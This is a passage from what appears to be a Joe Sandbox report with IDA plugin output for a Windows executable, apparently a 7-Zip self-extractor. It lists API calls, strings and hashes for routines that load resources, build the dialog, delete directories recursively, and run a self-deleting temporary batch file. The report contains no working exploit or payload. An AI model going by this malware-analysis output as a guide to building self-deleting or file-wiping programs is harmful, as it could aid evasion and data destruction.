FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401C1B
SizeofResource.KERNEL32(00000000,00000000), ref: 00401C2C
LoadResource.KERNEL32(00000000,00000000), ref: 00401C36
LockResource.KERNEL32(00000000), ref: 00401C41
LoadLibraryA.KERNEL32(kernel32,SetProcessPreferredUILanguages), ref: 00401C6D
GetProcAddress.KERNEL32(00000000), ref: 00401C76
wsprintfW.USER32 ref: 00401C95
LoadLibraryA.KERNEL32(kernel32,SetThreadPreferredUILanguages), ref: 00401CAA
GetProcAddress.KERNEL32(00000000), ref: 00401CAD

Strings

kernel32, xrefs: 00401C5D, 00401C62, 00401CA9
%04X%c%04X%c, xrefs: 00401C8F
SetProcessPreferredUILanguages, xrefs: 00401C58
SetThreadPreferredUILanguages, xrefs: 00401CA4

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: Resource$Load$AddressFindLibraryProc$HandleLockModuleSizeofwsprintf
String ID: %04X%c%04X%c$SetProcessPreferredUILanguages$SetThreadPreferredUILanguages$kernel32
API String ID: 2639302590-365843014
Opcode ID: a5d0d847a20e007311d4afefc35bdd0d1043cb70ace8406c3a5a944bd10805b9
Instruction ID: 1b367ad183524107b1556f539f271e2bfa11f4d2ebd4ebc35158efee647c5c94
Opcode Fuzzy Hash: a5d0d847a20e007311d4afefc35bdd0d1043cb70ace8406c3a5a944bd10805b9
Instruction Fuzzy Hash: 002153B1944318BBDB109FA59D48F9B7FBCEB48751F118036FA05B72D1D678DA008BA8

Function 00407776 Relevance: 16.6, APIs: 11, Instructions: 96stringwindowCOMMON

Download Yara Rule

APIs

wvsprintfW.USER32(?,00000000,?), ref: 0040779A
GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: FormatMessagelstrcpylstrlen$??2@??3@ErrorFreeLastLocalwvsprintf
String ID:
API String ID: 829399097-0
Opcode ID: b9cbf9bda790a6388220d479b475a156c1e2b9e46ad6f4b7f0f6ac65af34f938
Instruction ID: 98041b7e574f1f1c61a73cce3db0a13ad597614178cae5aaf21d0c5f67190c53
Opcode Fuzzy Hash: b9cbf9bda790a6388220d479b475a156c1e2b9e46ad6f4b7f0f6ac65af34f938
Instruction Fuzzy Hash: 85218172804209BEDF14AFA0DC85CEB7BACEB04355B10847BF506A7150EB34EE848BA4

Function 00402B79 Relevance: 16.6, APIs: 11, Instructions: 90filestringCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,00413454,?,?,?,00000000), ref: 00402BA8
lstrcmpW.KERNEL32(?,00413450,?,0000005C,?,?,?,00000000), ref: 00402BFB
lstrcmpW.KERNEL32(?,00413448,?,?,00000000), ref: 00402C11
SetFileAttributesW.KERNEL32(?,00000000,?,0000005C,?,?,?,00000000), ref: 00402C27
DeleteFileW.KERNEL32(?,?,?,00000000), ref: 00402C2E
FindNextFileW.KERNEL32(00000000,00000010,?,?,00000000), ref: 00402C40
FindClose.KERNEL32(00000000,?,?,00000000), ref: 00402C4F
SetFileAttributesW.KERNEL32(?,00000000,?,?,00000000), ref: 00402C5A
RemoveDirectoryW.KERNEL32(?,?,?,00000000), ref: 00402C63
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402C6E
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 00402C79

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: File$Find$??3@Attributeslstrcmp$CloseDeleteDirectoryFirstNextRemove
String ID:
API String ID: 1862581289-0
Opcode ID: 5afd75693816e096cb38d9cfb56cdb6fa5a1390c6eeb91725b01582b9db798b9
Instruction ID: 7ffcf375551190f92b7aba4ef5ef3cd4ed0286f9dec59b0789af02bc25bdcc12
Opcode Fuzzy Hash: 5afd75693816e096cb38d9cfb56cdb6fa5a1390c6eeb91725b01582b9db798b9
Instruction Fuzzy Hash: A321A230500209BAEB10AF61DE4CFBF7B7C9B0470AF14417AB505B11E0EB78DB459A6C

Function 00406D5D Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 39libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(uxtheme,?,00407F57,000004B1,00000000,?,?,?,?,?,0040803E), ref: 00406D65
GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 00406D76
GetWindow.USER32(?,00000005), ref: 00406D8F
GetWindow.USER32(00000000,00000002), ref: 00406DA5

Strings

SetWindowTheme, xrefs: 00406D70
\EA, xrefs: 00406D98
uxtheme, xrefs: 00406D5E

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: Window$AddressLibraryLoadProc
String ID: SetWindowTheme$\EA$uxtheme
API String ID: 324724604-1613512829
Opcode ID: 249f97bdfab0f17876e9996a58034084f131abf1d363e9cca7f48feb82d9f298
Instruction ID: f2e0bdee1e376373ef12be0a37c87caa708c4cf78f5ebad58458586032015049
Opcode Fuzzy Hash: 249f97bdfab0f17876e9996a58034084f131abf1d363e9cca7f48feb82d9f298
Instruction Fuzzy Hash: 47F0A73274172537C6312A6A6C4CF9B6B9C9FC6B51B070176B905F7280DA6CCD0045BC

Function 0041022D Relevance: .5, Instructions: 501COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff1f75169f88eb9072603f867e1b9c380318d13f71256e892471df4b1a5f26b0
Instruction ID: 2cf66fefa79674a345482580870fbecf2b771b639b37e27eb1fc897e4fc9b441
Opcode Fuzzy Hash: ff1f75169f88eb9072603f867e1b9c380318d13f71256e892471df4b1a5f26b0
Instruction Fuzzy Hash: 44126E31E00129DFDF08CF68C6945ECBBB2EF85345F2585AAD856AB280D6749EC1DF84

Function 0041206B Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e2407533f79ef22d8e6d794d98aef535f9904e2ced6ea7e6753812806be966d
Instruction ID: 8743f1180a29be23716da9caa70fae7f7856ace610ba4dfa2102d12747f13ae8
Opcode Fuzzy Hash: 6e2407533f79ef22d8e6d794d98aef535f9904e2ced6ea7e6753812806be966d
Instruction Fuzzy Hash: D12129725104255BC711DF1DE8887B7B3E1FFC4319F678A36DA81CB281C629D894C6A0

Function 00411F91 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
Instruction ID: 7cc7f0f00d3fdf34bc0739e2af2c3edfb6ca911da6c9eaecf720caf4c907201e
Opcode Fuzzy Hash: a91e830b051fd3563903b3b4c558af91fd9d6843125d3e1887e1db665648e344
Instruction Fuzzy Hash: 0621F53290062587CB12CE6EE4845A7F392FBC436AF134727EE84A3291C62CA855C6A0

Function 0040D72E Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dde32e57196543c58229ec3a92fed9e80e5316f67d8377c6540d091cf30b3fc0
Instruction ID: 0032c0c3dd355d3b1328166acc4be040b7821e5e83bc1fe28c274bced218c28f
Opcode Fuzzy Hash: dde32e57196543c58229ec3a92fed9e80e5316f67d8377c6540d091cf30b3fc0
Instruction Fuzzy Hash: 4EF074B5A05209EFCB09CFA9C49199EFBF5FF48304B1084A9E819E7350E731AA11CF50

Function 00404AFF Relevance: 36.9, APIs: 14, Strings: 7, Instructions: 144fileCOMMON

Download Yara Rule

APIs

GetDriveTypeW.KERNEL32(?,?,?), ref: 00404B46
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00404B77
WriteFile.KERNEL32(004177C4,?,?,00406437,00000000,del ",:Repeat,00000000), ref: 00404C2C
??3@YAXPAX@Z.MSVCRT(?), ref: 00404C37
CloseHandle.KERNEL32(004177C4), ref: 00404C40
SetFileAttributesW.KERNEL32(00406437,00000000), ref: 00404C57
ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00404C69
??3@YAXPAX@Z.MSVCRT(?), ref: 00404C72
??3@YAXPAX@Z.MSVCRT(?), ref: 00404C7E
??3@YAXPAX@Z.MSVCRT(00406437,?), ref: 00404C84
??3@YAXPAX@Z.MSVCRT(00406437,?,?,?,?,?,?,?,?,?,?,?,?,?,00406437,004177C4), ref: 00404CB2

Strings

open, xrefs: 00404C63
:Repeat, xrefs: 00404B92
del ", xrefs: 00404B9F, 00404BA4, 00404BED
", xrefs: 00404BB9, 00404BBE, 00404C02
" goto Repeat, xrefs: 00404BE0
7ZSfx%03x.cmd, xrefs: 00404B58
if exist ", xrefs: 00404BC7

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: ??3@$File$AttributesCloseCreateDriveExecuteHandleShellTypeWrite
String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
API String ID: 3007203151-3467708659
Opcode ID: 8db0a852e8f07615ca71e89a5e8499d157ac21a3ef6ef0968c72f21250096e4b
Instruction ID: 7a4c4b622d76ac6c1822c64a370ea4e05d699ec4102568342bfcf68b8c9639ad
Opcode Fuzzy Hash: 8db0a852e8f07615ca71e89a5e8499d157ac21a3ef6ef0968c72f21250096e4b
Instruction Fuzzy Hash: DE416171D01119BADB00EBA5ED85DEEBB78EF44358F50803AF511720E1EB78AE85CB58

Function 00404603 Relevance: 35.2, APIs: 3, Strings: 17, Instructions: 207stringCOMMON

Download Yara Rule

APIs

lstrcmpiW.KERNEL32(00000000,0041442C,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004046DF

Part of subcall function 00401F9D: GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
Part of subcall function 00401F9D: wsprintfW.USER32 ref: 00401FFD
Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 00402017
Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 0040204C
Part of subcall function 00401F9D: lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
Part of subcall function 00401F9D: SetLastError.KERNEL32(00000000), ref: 00402098
Part of subcall function 00401F9D: lstrlenA.KERNEL32(00413FD0), ref: 004020CC
Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
Part of subcall function 00401F9D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119

_wtol.MSVCRT ref: 004047DC
_wtol.MSVCRT ref: 004047F8

Strings

GUIMode, xrefs: 004046F4
ExtractTitle, xrefs: 004046AF
ExtractPathText, xrefs: 00404819
WarningTitle, xrefs: 00404697
CancelPrompt, xrefs: 00404831
OverwriteMode, xrefs: 00404721
ErrorTitle, xrefs: 0040467F
Progress, xrefs: 004046C7
GUIFlags, xrefs: 0040473E, 00404743, 0040475F
ExtractPathWidth, xrefs: 004047E5
MiscFlags, xrefs: 00404771, 00404776, 00404792
ExtractCancelText, xrefs: 004047A1
ExtractPathTitle, xrefs: 00404801
|wA, xrefs: 0040464B
ExtractDialogWidth, xrefs: 004047BE
Title, xrefs: 00404611
ExtractDialogText, xrefs: 004047AD

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: ErrorLast$??2@EnvironmentVariable_wtollstrcmpi$??3@InfoLocalelstrlenwsprintf
String ID: CancelPrompt$ErrorTitle$ExtractCancelText$ExtractDialogText$ExtractDialogWidth$ExtractPathText$ExtractPathTitle$ExtractPathWidth$ExtractTitle$GUIFlags$GUIMode$MiscFlags$OverwriteMode$Progress$Title$WarningTitle$|wA
API String ID: 2725485552-3187639848
Opcode ID: 176a5781913efe1eb66ce12b6334ecb6201c8ddbf0a651fa5ffb65b9d7765dbc
Instruction ID: a5d789275b7dd46d140941e9fd319bf554fc7ea6ad5da08365fcb0f0a182a74d
Opcode Fuzzy Hash: 176a5781913efe1eb66ce12b6334ecb6201c8ddbf0a651fa5ffb65b9d7765dbc
Instruction Fuzzy Hash: 4251B5F1A402047EDB10BB619D86EFF36ACDA85308B64443BF904F32C1E6BC5E854A6D

Function 00402DC0 Relevance: 35.1, APIs: 16, Strings: 4, Instructions: 123windowlibrarystringCOMMON

Download Yara Rule

APIs

GetClassNameA.USER32(?,?,00000040), ref: 00402DD3
lstrcmpiA.KERNEL32(?,STATIC), ref: 00402DE6
GetWindowLongW.USER32(?,000000F0), ref: 00402DF3

Part of subcall function 00402D7D: GetWindowTextLengthW.USER32(?), ref: 00402D8E
Part of subcall function 00402D7D: GetWindowTextW.USER32(00402E07,00000000,00000001), ref: 00402DAB

Part of subcall function 00401A85: CharUpperW.USER32(?,7556E0B0,00000000,00000000,?,?,?,00403DBD,00000002), ref: 00401AC3
Part of subcall function 00401A85: CharUpperW.USER32(?,?,?,?,00403DBD,00000002), ref: 00401ACF

??3@YAXPAX@Z.MSVCRT(?), ref: 00402E20
GetParent.USER32(?), ref: 00402E2E
LoadLibraryA.KERNEL32(riched20), ref: 00402E42
GetMenu.USER32(?), ref: 00402E55
SetThreadLocale.KERNEL32(00000419), ref: 00402E62
CreateWindowExW.USER32(00000000,RichEdit20W,0041335C,50000804,?,?,?,?,?,00000000,00000000,00000000), ref: 00402E92
DestroyWindow.USER32(?), ref: 00402EA3
SendMessageW.USER32(00000000,00000459,00000022,00000000), ref: 00402EB8
GetSysColor.USER32(0000000F), ref: 00402EBC
SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00402ECA
SendMessageW.USER32(00000000,00000461,?,?), ref: 00402EF5
??3@YAXPAX@Z.MSVCRT(?), ref: 00402EFA
??3@YAXPAX@Z.MSVCRT(?,?), ref: 00402F02

Strings

RichEdit20W, xrefs: 00402E8C
STATIC, xrefs: 00402DDD
riched20, xrefs: 00402E3D
{\rtf, xrefs: 00402E09

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: Window$??3@MessageSend$CharTextUpper$ClassColorCreateDestroyLengthLibraryLoadLocaleLongMenuNameParentThreadlstrcmpi
String ID: RichEdit20W$STATIC$riched20${\rtf
API String ID: 1731037045-2281146334
Opcode ID: 656a9ef2309d032f4de682c1b2e9bfccbe9871d95fe953ac1201f86e79704a8f
Instruction ID: c7c9ca1f65d7473fe19c29f8272bdbb18bb8b251efb89c9ee4785ec66c96c850
Opcode Fuzzy Hash: 656a9ef2309d032f4de682c1b2e9bfccbe9871d95fe953ac1201f86e79704a8f
Instruction Fuzzy Hash: FE316072A40119BFDB01AFA5DD49DEF7BBCEF08745F104036F601B21D1DA789A008B68

Function 00401CC8 Relevance: 31.6, APIs: 21, Instructions: 121windowCOMMON

Download Yara Rule

APIs

GetWindowDC.USER32(00000000), ref: 00401CD4
GetDeviceCaps.GDI32(00000000,00000058), ref: 00401CE0
MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401CF9
GetObjectW.GDI32(?,00000018,?), ref: 00401D28
MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D33
MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D3D
CreateCompatibleDC.GDI32(?), ref: 00401D4B
CreateCompatibleDC.GDI32(?), ref: 00401D52
SelectObject.GDI32(00000000,?), ref: 00401D60
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401D6E
SelectObject.GDI32(00000000,00000000), ref: 00401D76
SetStretchBltMode.GDI32(00000000,00000004), ref: 00401D7E
StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401D9D
GetCurrentObject.GDI32(00000000,00000007), ref: 00401DA6
SelectObject.GDI32(00000000,?), ref: 00401DB3
SelectObject.GDI32(00000000,?), ref: 00401DB9
DeleteDC.GDI32(00000000), ref: 00401DC2
DeleteDC.GDI32(00000000), ref: 00401DC5
ReleaseDC.USER32(00000000,?), ref: 00401DCC
ReleaseDC.USER32(00000000,?), ref: 00401DDB
CopyImage.USER32(?,00000000,00000000,00000000,00000000), ref: 00401DE8

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1502854288.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502884450.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502898089.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1502912616.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_9mauyKC3JW.jbxd

Similarity

API ID: Object$Select$CompatibleCreate$DeleteReleaseStretch$BitmapCapsCopyCurrentDeviceImageModeWindow
String ID:
API String ID: 3462224810-0
Opcode ID: edcdae41b00ef410d3e7ba3ed19d3c131e86ad83f2f2f2d47359cb6bb3a71bdf
Instruction ID: 24730f8ff9b6a3f8d7f0600a39c6f646a54ca28d21b12e05547a6914d757f366
Opcode Fuzzy Hash: edcdae41b00ef410d3e7ba3ed19d3c131e86ad83f2f2f2d47359cb6bb3a71bdf
Instruction Fuzzy Hash: 00313976D00208BBDF215FA19C48EEFBFBDEB48752F108066F604B21A0C6758A50EB64

Function 00401DF3 Relevance: 28.1, APIs: 14, Strings: 2, Instructions: 120windowcommemoryCOMMON

Download Yara Rule

APIs

GetClassNameA.USER32(?,?,00000040), ref: 00401E05
lstrcmpiA.KERNEL32(?,STATIC), ref: 00401E1C
GetWindowLongW.USER32(?,000000F0), ref: 00401E2F
GetMenu.USER32(?), ref: 00401E44

Part of subcall function 00401BDF: GetModuleHandleW.KERNEL32(00000000), ref: 00401BEA
Part of subcall function 00401BDF: FindResourceExA.KERNEL32(00000000,?,?,00000000), ref: 00401C07
Part of subcall function 00401BDF: FindResourceExA.KERNEL32(00000000,?,?,00000409), ref: 00401C1B
Part of subcall function 00401BDF: SizeofResource.KERNEL32(00000000,00000000), ref: 00401C2C
Part of subcall function 00401BDF: LoadResource.KERNEL32(00000000,00000000), ref: 00401C36
Part of subcall function 00401BDF: LockResource.KERNEL32(00000000), ref: 00401C41

GlobalAlloc.KERNEL32(00000040,00000010), ref: 00401E76
memcpy.MSVCRT(00000000,00000000,00000010), ref: 00401E83
CoInitialize.OLE32(00000000), ref: 00401E8C
CreateStreamOnHGlobal.OLE32(00000000,00000000,?), ref: 00401E98
OleLoadPicture.OLEAUT32(?,00000000,00000000,00414C14,?), ref: 00401EBD
GlobalFree.KERNEL32(00000000), ref: 00401ECD

Part of subcall function 00401CC8: GetWindowDC.USER32(00000000), ref: 00401CD4
Part of subcall function 00401CC8: GetDeviceCaps.GDI32(00000000,00000058), ref: 00401CE0
Part of subcall function 00401CC8: MulDiv.KERNEL32(00000000,00000064,00000060), ref: 00401CF9
Part of subcall function 00401CC8: GetObjectW.GDI32(?,00000018,?), ref: 00401D28
Part of subcall function 00401CC8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D33
Part of subcall function 00401CC8: MulDiv.KERNEL32(?,00000003,00000002), ref: 00401D3D
Part of subcall function 00401CC8: CreateCompatibleDC.GDI32(?), ref: 00401D4B
Part of subcall function 00401CC8: CreateCompatibleDC.GDI32(?), ref: 00401D52
Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401D60
Part of subcall function 00401CC8: CreateCompatibleBitmap.GDI32(?,?,?), ref: 00401D6E
Part of subcall function 00401CC8: SelectObject.GDI32(00000000,00000000), ref: 00401D76
Part of subcall function 00401CC8: SetStretchBltMode.GDI32(00000000,00000004), ref: 00401D7E
Part of subcall function 00401CC8: StretchBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 00401D9D
Part of subcall function 00401CC8: GetCurrentObject.GDI32(00000000,00000007), ref: 00401DA6
Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401DB3
Part of subcall function 00401CC8: SelectObject.GDI32(00000000,?), ref: 00401DB9
Part of subcall function 00401CC8: DeleteDC.GDI32(00000000), ref: 00401DC2
Part of subcall function 00401CC8: DeleteDC.GDI32(00000000), ref: 00401DC5
Part of subcall function 00401CC8: ReleaseDC.USER32(00000000,?), ref: 00401DCC

GetObjectW.GDI32(00000000,00000018,?), ref: 00401EFF
SetWindowPos.USER32(00000010,00000000,00000000,00000000,?,?,00000006), ref: 00401F13
SendMessageW.USER32(00000010,00000172,00000000,?), ref: 00401F25
GlobalFree.KERNEL32(00000000), ref: 00401F3A

Strings

IMAGES, xrefs: 00401E4E
STATIC, xrefs: 00401E13

Memory Dump Source

Source File: 00000000.00000002.1502867588.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

